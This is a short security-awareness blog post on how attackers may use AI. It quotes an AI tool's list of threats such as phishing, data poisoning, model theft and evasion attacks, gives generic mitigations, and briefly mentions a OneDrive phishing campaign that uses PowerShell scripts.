Can AI be Used by Attackers?

Does the sun shine brightly? Yes.

Remember the old adage, everything we use can be used against us… so of course attackers will use AI.

So yes AI or artificial intelligence will be used by attackers to create better phishing campaigns and to translate any language to another. First of all we can assume misspelled words will likely not happen anymore to a well run phishing campaign.

But that is the ‘easy’ thought of how AI will be used.

So of course the smart thing to do is to ask AI engine: “What are some ways AI can be used by attackers?”

Here are the answers:

  1. AI-Powered Phishing Attacks: Attackers use AI algorithms to craft highly convincing and personalized phishing emails. These AI-generated messages are more likely to trick even vigilant users due to their realistic content and proper grammar. The FBI has warned about the increasing threat of AI-driven phishing attacks that can tailor messages to specific recipients, making them more effective at data theft

2. Data Poisoning: This involves manipulating the training data of AI models to corrupt their learning process

. Attackers can publish poisoned data on the internet, which may then be inadvertently used to train AI systems. This can lead to compromised AI models that behave in ways beneficial to the attacker

3. AI Model Theft: Cybercriminals attempt to reverse engineer or hijack AI models, especially those deployed on vulnerable hardware or accessible through public APIs

. This allows them to potentially access sensitive data used in training or replicate the AI system for malicious purposes.

4. Evasion Attacks: These attacks involve altering input data to trick machine learning models. For example, attackers might subtly modify a stop sign’s appearance to make a self-driving car’s AI misinterpret it

 This type of attack can have serious real-world consequences.

To mitigate these AI-based threats, organizations should:

  1. Implement robust data validation and cleaning processes to prevent data poisoning.
  2. Use secure environments for AI model training and deployment.
  3. Regularly update and patch AI systems to address known vulnerabilities.
  4. Employ AI-powered threat detection systems to identify anomalous behavior

.There are multiple types of evasion attacks:

Evasion attacks are a type of cyber attack in which the attacker attempts to bypass the security measures of a target system by manipulating or disguising the malicious traffic. These attacks can take various forms, including:

  1. Protocol evasion: The attacker manipulates the communication protocol to bypass security controls, such as firewalls or intrusion detection systems.
  2. Application-level evasion: The attacker modifies the payload of the attack to evade detection by security software, such as antivirus or intrusion prevention systems.
  3. Timing-based evasion: The attacker uses specific timing techniques to bypass security controls that rely on analyzing the time between packets or requests.
  4. Fragmentation-based evasion: The attacker splits the malicious traffic into smaller fragments, making it difficult for security systems to reassemble and detect the attack.

To defend against evasion attacks, organizations should implement a multi-layered security approach that includes continuous monitoring, threat intelligence, and regular security updates. Additionally, security professionals should stay up-to-date with the latest attack techniques and trends to better understand and mitigate potential threats.

So what can be done (besides 4 steps above)

Must stay ahead of the game by never stopping to learn new methods and lean how new tools are being used.

Contact us to discuss.  Buy the book I wrote.

 

One attack that was discussed is a campaign by  attackers using phishing to get powershell scripts to run on OneDrive platform.

As you see in above screenshot from my phone – there is an article describing  the OneDrive Phishing scam which attempts to trick users into running a powershell script which is not a good idea.  there are a couple of articles including one from Hacker News.  As usual phishing is the number one attack vector.

 

I could find other examples of AI driven attacks, but the attackers share among themselves possible attacks as it is, no need to add to the volume. One example attack is good.